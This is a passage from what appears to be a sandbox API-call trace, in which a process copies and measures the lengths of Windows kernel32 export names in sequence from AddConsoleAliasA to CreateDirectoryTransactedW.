lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.584] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.584] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.584] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.584] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.584] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.584] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.584] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.584] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.584] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.585] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.585] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.585] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.585] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.585] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.585] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.585] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.585] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.585] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.585] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.585] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.585] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.585] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.585] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.585] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.585] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.585] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.585] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.585] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.586] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.586] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.586] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.586] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.586] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.586] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.586] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.586] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.586] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.586] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.586] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.586] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.586] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.586] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.586] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.586] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.586] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.586] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.586] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.587] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.587] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.587] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.587] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.587] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.587] lstrlenA (lpString="BEEP") returned 4 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.587] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.587] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.587] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.587] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.587] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.587] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.587] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.587] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.587] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.587] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.587] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.587] lstrlenA (lpString="CANCELIO") returned 8 [0083.587] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.588] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.588] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.588] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.588] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.588] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.588] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.588] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.588] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.588] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.588] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.588] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.588] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.588] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.588] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.588] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.588] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.588] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.588] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.588] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.589] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.589] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.589] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.589] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.589] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.589] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.589] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.589] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.589] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.589] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.589] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.589] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.589] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.589] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.589] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.589] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.589] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.589] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.589] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.589] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.590] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.590] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.590] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.590] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.590] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.590] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.590] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.590] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.590] lstrlenA (lpString="COPYFILEA") returned 9 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.590] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.590] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.590] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.590] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.590] lstrlenA (lpString="COPYFILEW") returned 9 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.590] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.590] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.590] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.590] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.590] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.591] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.591] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.591] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.591] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.591] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.591] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") 